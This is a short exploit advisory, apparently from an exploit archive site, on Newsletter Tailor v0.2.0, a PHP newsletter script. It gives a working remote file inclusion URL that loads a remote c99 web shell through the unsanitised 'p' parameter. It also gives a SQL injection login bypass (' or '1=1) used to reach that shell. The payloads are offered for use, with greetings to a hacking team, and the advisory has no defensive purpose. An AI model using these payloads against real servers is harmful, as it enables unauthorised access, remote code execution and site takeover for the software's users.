[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Newsletter Tailor v0.2.0 RFI Vulnerability
# Published : 2010-02-09
# Author : Snakespc
# Previous Title : Limny v1.01 Remote File Upload Vulnerability
# Next Title : osTicket v1.6 RC5 Multiple Vulnerabilities
==============================================================================
[?] Newsletter Tailor Remote File Include Vulnerability
==============================================================================
[?] Script: [ Newsletter Tailor ]
[?] Language: [ PHP ]
[?] Download: [ http://sourceforge.net/projects/nlettertailor/ ]
[?] Founder: [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]
[?] Greetz to:[ SnakesTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]
[?] Note: [ Thank you ViRuSMaN on script ]
###########################################################################
===[ Exploit ]=== include($p.".php");
[?] http://server/list/admin/index.php?p=http://localhost/c99.txt?
[?]Note: When you update the page prompts you to log on
[?](Auth Bypass) SQL Injection :user:' or '1=1 pass:' or '1=1
Then be accessed on the "sh3ll"
Author: Snakespc <-
###########################################################################